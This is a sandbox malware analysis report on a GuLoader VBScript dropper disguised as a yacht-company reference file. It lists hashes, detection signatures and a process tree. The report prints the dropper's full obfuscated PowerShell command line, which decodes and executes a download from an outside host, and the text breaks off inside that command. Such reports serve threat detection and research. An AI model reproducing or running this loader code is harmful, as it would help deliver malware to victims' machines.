Edit tour
Windows
Analysis Report
ADEX YACHTING Kft. REF HU03192025.vbs
Overview
General Information
| Sample name: | ADEX YACHTING Kft. REF HU03192025.vbs |
| Analysis ID: | 1643196 |
| MD5: | 835c949fce1c6098f41b21012eeebcb8 |
| SHA1: | fe514f8af0e249db98e9ddfa5ce21020c4da13b4 |
| SHA256: | 85ae52ee28d81706237bb397f2bb52ce86173a3374b7f7629d9bc51ed4e99cfb |
| Tags: | GuLoaderHUNvbsuser-smica83 |
| Infos: |   |
 | |
Detection
GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7424 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\ADEX YACHTING K ft. REF HU 03192025.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 7524 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "Get-Servi ce;$Grovel lingly='fu nc';Get-Hi story;$Gro vellingly+ ='t';Get-H istory;$Gr ovellingly +='ion:';( ni -p $Gro vellingly -n Pigtraa dsorkester et -value { param($T ightwads); $Sildetnde rs=1;do {$ budskabs+= $Tightwads [$Sildetnd ers];$Sild etnders+=2 } until(!$ Tightwads[ $Sildetnde rs])$budsk abs});Conv ertTo-Html ;(ni -p $G rovellingl y -n Blodt rykkene -v alue {para m($Tracing s);.($Tuss ede) ($Tra cings)});C onvertTo-H tml;$Hakke lsemaskine =Pigtraads orkesteret 'MN E,tK. .w';$Hakke lsemaskine +=Pigtraad sorkestere t 'Ve BFcR LCIAeTNAt' ;$Pseu.las sic=Pigtra adsorkeste ret ',M oI z i,lPl aU /';$Progra mmernes=Pi gtraadsork esteret 'r T lVs 1 2' ;$Fyndige= ' [CNVe,ta . SLEBRDv. IFc E p o i NAT mTAF nLa gCEKR ] : :,sSE C u rPITTF y,P r,O t o CLo.lS=F $ pKRbO g REARM,m EH R NUeCs';$ Pseu.lassi c+=Pigtraa dsorkester et ' 5A. 0 u ( WNiMn dCoUw.s FN LT, 1,0T., 0.;R .W iu nD6 4S; Hx N6.4 ;P r vA: 1,3 4U .V0K)T GAe cDkSo /,2 0i1P0H0,1 0 1U FLiI r eFfOo.xB / 1 3B4C.D 0';$Sldens =Pigtraads orkesteret ',uAsHEEr O-Ea g e.n TT';$tudem ikkels=Pig traadsorke steret 'Th ut t pRsD: ,/ / m oLb iSm pte x M..r oS/BE gv,a keuke RrHi n gDs Bv e lPswe r n.e,s,. LtAhDn';$B iharmonic1 06=Pigtraa dsorkester et 'S>';$T ussede=Pig traadsorke steret ' i E X';$Lys kurvene96= 'Survivali sts';$Flys tyrtenes=' \daturism. Hyp';Blodt rykkene (P igtraadsor kesteret ' Y$SG lLo b SA LS:Bv o kra T,iEV Ds.=P$Te n ,vU: aFp p d,AMT AE+ C$AFRL y,s t.y R.t,E FnAeHs');B lodtrykken e (Pigtraa dsorkester et '.$PGHl ZoUBFASlS: lTD eMRS= $ tuU D e M IMK.KHE HL sM. sBP DlRi TC( $ hB iUHSaAr m O n IEC A1 0S6 )') ;Blodtrykk ene (Pigtr aadsorkest eret $Fynd ige);$tude mikkels=$L der[0];$Af sejl=(Pigt raadsorkes teret ' $G G l,O B.AT LN:.UUDRS TTaTtUI.O nYe.r ERnE DKESSM= nK E wB-PoPB j EfcKT S NyUSMT,eSm y.B$BhpaiK Jk eMl,S E MBa sTK i Sn E');Blo dtrykkene ($Afsejl); Blodtrykke ne (Pigtra adsorkeste ret 'C$,U dCsAt aTtU iSo nFeEr e nGdSeRsA .PHaeOa dC eFrDsK[ $ SKltd eFn. s ] =I$WP sPe u.d oM cHl a.sJs iAc');$For lagshistor iers=Pigtr aadsorkest eret ' $AU d sTtpaAt iSo n e r e.nAd,e s B. D o w n ,l,oCa dTF DiElSe.(A$ t uGdTe m SiOk.k e l SsK,a$BD e lCl.aHvPo AlRpTi a n Fe rFnSeDs ,)';$Della volpianern es=$Vokati vs;Blodtry kkene (Pig traadsorke steret ' $ AGAL,ODbSa ClM: m I S ,GHISV ESS ,= (HT EBS Tu-SPSaHt hB F$ d E Sl,l ASvVO L p i a,N AEUrFN euS v)');while (!$Misgiv es) {Blodt rykkene (P igtraadsor kesteret ' G$igblSo b SaElD:EOTi Ae =.$UMUe DdTpIlPawn ') ;Blodtr ykkene $Fo rlagshisto riers;Blod trykkene ( Pigtraadso rkesteret 'V[ tAh r, eaA,d I N GD.DTUh.rT EKa Db] :P : sTLAE e